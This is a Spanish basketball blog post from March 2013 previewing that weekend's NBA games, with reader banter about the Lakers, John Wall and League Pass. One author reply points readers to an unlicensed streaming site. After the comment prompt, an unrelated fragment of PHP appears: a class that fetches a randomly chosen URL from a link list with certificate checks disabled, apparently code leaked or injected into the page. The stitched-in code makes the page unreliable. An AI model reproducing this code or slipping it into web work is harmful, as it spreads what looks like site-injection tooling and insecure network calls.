Fin de semana: baloncesto del bueno

22 de March de 2013 por MagicJohnson32

Mientras algunos estáis pendientes de la NCAA y el March Madness, otros preferimos mantener nuestra atención en baloncesto del bueno, también conocido como NBA. Los puntos de interés para el fin de semana que se nos presenta son, más o menos, los mismos del fin de semana anterior. Es decir: las rachas ganadoras de Miami Heat y Denver Nuggets, la carrera entre Warriors, Rockets, Lakers y Jazz por las tres últimas plazas de Playoffs en el Oeste, y la lucha en ambas conferencias por la ventaja de campo en primera ronda. Además, el más que probable regreso de Tony Parker, Kobe Bryant y Pau Gasol adorna la madrugada del viernes. Aunque si hay un retorno esperado por todos y que podría producirse estos días es el de Derrick Rose.

Vamos al detalle de lo que nos espera.

VIERNES

  • Bucks @ Pacers (0h00): la visita de los ciervos a Indianapolis supone el único partido del viernes que enfrenta a dos equipos situados en posiciones de Playoffs. David West volverá a ser baja, pero Tyler Hansbrough lo está supliendo de manera ejemplar. Tampoco es segura la participación de Monta Ellis y Ersan Ilyasova, con lo cual Boylan optaría de nuevo por salir con las dos torres, Sanders & Dalembert. También a las 0h00: dos partidos con claro favoritismo visitante, el Knicks @ Raptors y el Thunder @ Magic, marcados por el duelo Gay vs Melo y la reacción de los Thunder tras sus dos últimas derrotas. Vucevic es baja y Vaughn apostará por O’Quinn de inicio.
  • Pistons @ Heat (0h30): ¿25? Todo apunta en ese sentido, con los Pistons en caída libre y perdedores de sus últimos nueve partidos frente a unos Heat que apenas necesitan jugar un rato para seguir sumando victorias. Brandon Knight no llegará a tiempo de reaparecer y Stuckey volverá a formar como pareja exterior de Calderón. A la misma hora arrancará el Blazers @ Hawks.
  • A la 1h00: los Grizzlies visitan al colista del Oeste, unos Hornets que cerraron una racha de derrotas superando a los Celtics el pasado miércoles. Muy desequilibrado se presenta también el Cavs @ Rockets. Cleveland ha perdido cuatro partidos seguidos y los Rockets siguen sólidos en puestos de Playoffs.
  • A la 1h30: dos buenos partidos comparten horario. Son el Celtics @ Mavs y el Jazz @ Spurs. A Dallas se les acaban las opciones de luchar por los Playoffs, mientras Boston llega tras dos derrotas que le han devuelto a la séptima plaza del Este. Pero si un equipo llega con urgencias al fin de semana, ése son los Jazz, que han perdido 7 de los últimos 9 y se ven a 1,5 partidos de la octava posición. Los Spurs suponen ya la única amenaza de los Heat para el mejor récord de la regular season, y con Duncan al nivel que está jugando más el regreso de Tony Parker, todo es posible.
  • Wolves @ Suns (3h00): dos de los peores equipos del Oeste se enfrentan en Phoenix en un partido que probablemente se decida en el duelo de bases, Ricky vs Dragic.
  • lakers fullWizards @ Lakers (3h30): los Wizards visitan el Staples Center en un gran momento, y de hecho en el Este sólo los Heat presentan un mejor balance en los últimos 10 partidos. Liderados por un John Wall inconmensurable (momento que ha aprovechado para pedir una extensión por el máximo), amenazan la recuperación de los Lakers, que parece que contarán con Kobe Bryant y Pau Gasol para la ocasión. Kobe jugará de inicio sin limitaciones, pero a Pau probablemente lo veamos jugar no más de 25 minutos tras perderse las últimas 6 semanas lesionado.

SÁBADO

  • Pistons @ Bobcats (0h00): hay que ser muy fan de los Pistons o de Calderón para estar interesado en lo que suceda en este partido. Los Bobcats al menos vienen de ganar sus dos últimos partidos de manera consecutiva, cosa que no lograban desde noviembre.
  • Raptors @ Knicks (0h30): tras enfrentarse 24 horas antes en Canadá, los Raptors devuelven visita a los Knicks, necesitados de victorias si quieren hacerse con la segunda plaza del Este.
  • Pacers @ Bulls (1h00): el United Center acoge un más que posible cruce de primera ronda de Playoffs. ¿Volverá D-Rose para este partido? Nos lo creeremos cuando lo veamos.
  • Celtics @ Grizzlies (1h00): otro magnífico partido arranca a la 1 en Memphis, donde los Grizzlies reciben a los Celtics.
  • Kings @ Nuggets (2h00): el peor visitante de la liga visita al mejor local y poseedor de la mejor racha de victorias al margen de la de los Heat. Aun así, posiblemente se vea un bonito espectáculo en el Pepsi Center.
  • Wizards @ Warriors (3h30): los Wizards acaban su mini gira por el Oeste visitando a los Warriors, que ven amenazada la sexta posición ante el empuje de Rockets y Lakers.
  • Nets @ Clippers (3h30): interesante duelo entre los cuartos clasificados de Este y Oeste para cerrar la madrugada. A priori lo más interesante será el duelo entre los picks 3 y 4 del draft de 2005, Deron vs CP3.

DOMINGO

  • Hawks @ Bucks (20h00): a los Bucks se les presenta una buena oportunidad de aumentar sus escasas posibilidades de escalar alguna plaza para evitar a los Heat en primera ronda. Para ello, una victoria ante los Hawks sería imprescindible.
  • Bobcats @ Heat (23h00): el peor contra el mejor. Cosas muy raras tendrían que pasar para que los Heat no cierren el fin de semana con su 26ª victoria consecutiva.
  • harden spursSpurs @ Rockets (0h00): el derbi texano enfrentará al constante bombardeo triplista de los Rockets con la calculada propuesta de los Spurs. O lo que es lo mismo, Harden vs Duncan. A la misma hora, los Wolves recibirán a los Bulls y los Blazers tratarán de repetir en Oklahoma City la gesta lograda hace unos días en el Alamo.
  • Jazz @ Mavs (0h30): en función de los resultados del fin de semana, los Jazz podrían acabar el fin de semana en puestos de Playoffs o bien caer incluso hasta la undécima plaza del Oeste. La visita a los Mavs, equipo que le sigue en los standings, es un must win para los de Salt Lake City.
  • A las 2h00: acaba el fin de semana con dos partidos de escaso atractivo, las visitas de Nets y Sixers a Suns y Kings respectivamente.
Comenta

8 comentarios a esta entrada

  1. nba dice:
    #1

    Madre mia los Lakers, vuelven a las rutinas de siempre, se creen tan superiores que se relajan y les terminan remontando, aunque tampoco hay que olvidarse de D’antoni que es el primero en escurrir el bulto.
    Del partido de Wolves, lastima que la temporada para ellos ya este acabada, pero el partido de ayer demuesta ,que sanos podían estar ocupando el puesto de Houston o los Warriors, a ver como terminan la temporada a ver que decide Adelman para su futuro ya que sera esta decision la que determinará la proyeccion de los Wolves para la proxima temporada.
    Me pregunto,cuanto tiempo conseguiran retener a Lillard en los Blazzers, porque siendo aficionado Laker, hacia un cambio de casi todo el perimetro Laker del banquillo solo por traermelo a mi equipo

      Citar

  2. Melo15 dice:
    #2

    Alguien sabe si hay alguna prmocion rara para el Legue Pass esta Semana Santa?
    Por cierto vaya partidos esta haciendo Wall, como esta jugando!!!

      Citar

  3. MagicJohnson32 dice:
    #3

    Melo15:
    Alguien sabe si hay alguna prmocion rara para el Legue Pass esta Semana Santa?

    Nada que yo sepa. Pero si le echas un vistazo a rojadirecta no necesitarás el LP.

      Citar

  4. Denise dice:
    #4

    Melo15:
    Alguien sabe si hay alguna prmocion rara para el Legue Pass esta Semana Santa?
    Por cierto vaya partidos esta haciendo Wall, como esta jugando!!!

    No creo que en EEUU celebren eso de la Semana Santa. Supongo que la proxima semana no tendrá ningun significado especial para ellos…(aunque para mi tampoco lo tiene mas alla de las vacaciones).

      Citar

  5. MagicJohnson32 dice:
    #5

    Denise: No creo que en EEUU celebren eso de la Semana Santa. Supongo que la proxima semana no tendrá ningun significado especial para ellos…(aunque para mi tampoco lo tiene mas alla de las vacaciones).

    Sí, hombre, Easter. Hacen aquello de conejito de pascua, los huevos y tal.

      Citar

  6. Ekos dice:
    #6

    Y me repito una y otra vez, John Wall es una máquina.

      Citar

  7. MagicJohnson32 dice:
    #7

    Ekos:
    Y me repito una y otra vez, John Wall es una máquina.

    Ese tren inferior que le ha dado la naturaleza es un don. Da miedo pensar en lo que puede convertirse si mejora el tiro en suspensión.

      Citar

  8. R1Molano dice:
    #8

    Thompson es una maquina, otra defensa enorme (ya te coge un uno como un tres) y forzando la expulsión de Wall.
    De la banda de los Wizards ya solo queda el recuerdo, equipo muy muy serio.

    Por si alguno se lo pregunta, lo de Curry no es mas que torcedura, puede que incluso juegue mañana contra los Lakers

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>